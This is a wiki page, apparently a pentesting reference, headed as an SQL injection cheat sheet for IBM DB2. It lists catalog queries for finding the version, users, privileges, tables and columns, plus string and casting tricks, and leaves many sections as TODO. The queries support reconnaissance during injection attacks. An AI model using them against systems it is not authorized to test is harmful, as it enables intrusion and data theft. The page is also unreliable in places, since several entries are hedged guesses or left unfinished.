
Hacking - SQL Injection Cheat Sheet (DB2)

Version

select versionnumber, version_timestamp from sysibm.sysversions;

Comments

select blah from foo; -- comment like this

Current User

select user from sysibm.sysdummy1;

select session_user from sysibm.sysdummy1;

select system_user from sysibm.sysdummy1;

List Users

N/A (I think DB2 uses OS-level user accounts for authentication.)

Database authorities (like roles, I think) can be listed like this:

select grantee from syscat.dbauth;

List Password Hashes

N/A (I think DB2 uses OS-level user accounts for authentication.)

List Privileges

select * from syscat.tabauth; -- privs on tables

select * from syscat.dbauth where grantee = current user;

select * from syscat.tabauth where grantee = current user;

List DBA Accounts

TODO

Current Database

select current server from sysibm.sysdummy1;

List Databases

SELECT schemaname FROM syscat.schemata;

List Columns

select name, tbname, coltype from sysibm.syscolumns;

List Tables

select name from sysibm.systables;

Find Tables From Column Name

TODO

Select Nth Row

select name from (SELECT name FROM sysibm.systables order by name fetch first N+M-1 rows only) sq order by name desc fetch first N rows only;

Select Nth Char

SELECT SUBSTR('abc',2,1) FROM sysibm.sysdummy1;  -- returns b

Bitwise AND

This page seems to indicate that DB2 has no support for bitwise operators!

ASCII Value → Char

select chr(65) from sysibm.sysdummy1; -- returns 'A'

Char → ASCII Value

select ascii('A') from sysibm.sysdummy1; -- returns 65

Casting

SELECT cast('123' as integer) FROM sysibm.sysdummy1;

SELECT cast(1 as char) FROM sysibm.sysdummy1;

String Concatenation

SELECT 'a' concat 'b' concat 'c' FROM sysibm.sysdummy1; -- returns 'abc'

select 'a' || 'b' from sysibm.sysdummy1; -- returns 'ab'

If Statement

TODO

Case Statement

TODO

Avoiding Quotes

TODO

Time Delay

???

See Heavy Queries article for some ideas.

Make DNS Requests

TODO

Command Execution

TODO

Local File Access

TODO

Hostname, IP Address

TODO

Location of DB files

TODO

Default/System Databases

TODO

References

hacking/sql_injection_cheat_sheet_db2.1585735946.txt.gz · Last modified: 2020/07/15 09:30 (external edit)
